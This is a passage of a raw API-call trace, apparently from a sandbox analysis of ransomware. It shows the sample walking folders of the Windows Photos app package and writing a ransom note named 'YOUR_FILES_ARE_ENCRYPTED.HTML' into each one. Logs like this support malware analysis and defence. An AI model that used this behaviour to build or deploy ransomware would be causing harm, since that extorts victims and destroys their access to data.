dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0119.488] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.488] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies") returned 102 [0119.488] GetProcessHeap () returned 0x600000 [0119.488] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.490] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies" [0119.490] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0119.490] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d1c0, cFileName=".", cAlternateFileName="")) returned 0x626978 [0119.490] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d1c0, cFileName="..", cAlternateFileName="")) returned 1 [0119.490] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d1c0, cFileName="..", cAlternateFileName="")) returned 0 [0119.490] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0119.490] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0119.490] GetProcessHeap () returned 0x600000 [0119.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0119.491] WriteFile (in: hFile=0x338, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.492] CloseHandle (hObject=0x338) returned 1 [0119.492] GetProcessHeap () returned 0x600000 [0119.492] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.492] GetProcessHeap () returned 0x600000 [0119.492] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.492] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0119.492] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.492] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory") returned 102 [0119.492] GetProcessHeap () returned 0x600000 [0119.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.492] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory" [0119.492] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0119.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d1c0, cFileName=".", cAlternateFileName="")) returned 0x626978 [0119.493] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d1c0, cFileName="..", cAlternateFileName="")) returned 1 [0119.493] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d1c0, cFileName="..", cAlternateFileName="")) returned 0 [0119.493] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0119.493] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0119.493] GetProcessHeap () returned 0x600000 [0119.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0119.494] WriteFile (in: hFile=0x338, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.495] CloseHandle (hObject=0x338) returned 1 [0119.495] GetProcessHeap () returned 0x600000 [0119.495] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.495] GetProcessHeap () returned 0x600000 [0119.495] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.495] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="Temp", cAlternateFileName="")) returned 1 [0119.495] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.495] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp") returned 95 [0119.495] GetProcessHeap () returned 0x600000 [0119.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.495] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp" [0119.495] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp\\*" [0119.495] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d1c0, cFileName=".", cAlternateFileName="")) returned 0x626778 [0119.495] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d1c0, cFileName="..", cAlternateFileName="")) returned 1 [0119.495] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d1c0, cFileName="..", cAlternateFileName="")) returned 0 [0119.495] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0119.495] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0119.495] GetProcessHeap () returned 0x600000 [0119.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0119.496] WriteFile (in: hFile=0x338, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.498] CloseHandle (hObject=0x338) returned 1 [0119.499] GetProcessHeap () returned 0x600000 [0119.499] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.499] GetProcessHeap () returned 0x600000 [0119.499] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.499] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="Temp", cAlternateFileName="")) returned 0 [0119.499] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0119.499] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0119.500] GetProcessHeap () returned 0x600000 [0119.500] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.500] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.501] WriteFile (in: hFile=0x31c, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.502] CloseHandle (hObject=0x31c) returned 1 [0119.502] GetProcessHeap () returned 0x600000 [0119.502] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.502] GetProcessHeap () returned 0x600000 [0119.502] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.502] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a885816, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0119.502] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.502] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData") returned 95 [0119.502] GetProcessHeap () returned 0x600000 [0119.502] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.502] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData" [0119.502] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData\\*" [0119.502] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a885816, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.503] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a885816, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="..", cAlternateFileName="")) returned 1 [0119.503] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a885816, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="..", cAlternateFileName="")) returned 0 [0119.503] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.503] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0119.503] GetProcessHeap () returned 0x600000 [0119.504] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.504] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.504] WriteFile (in: hFile=0x31c, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.505] CloseHandle (hObject=0x31c) returned 1 [0119.505] GetProcessHeap () returned 0x600000 [0119.505] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.505] GetProcessHeap () returned 0x600000 [0119.506] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.506] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a885816, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0119.506] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.506] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache") returned 98 [0119.506] GetProcessHeap () returned 0x600000 [0119.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.506] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache" [0119.506] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache\\*" [0119.506] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a885816, 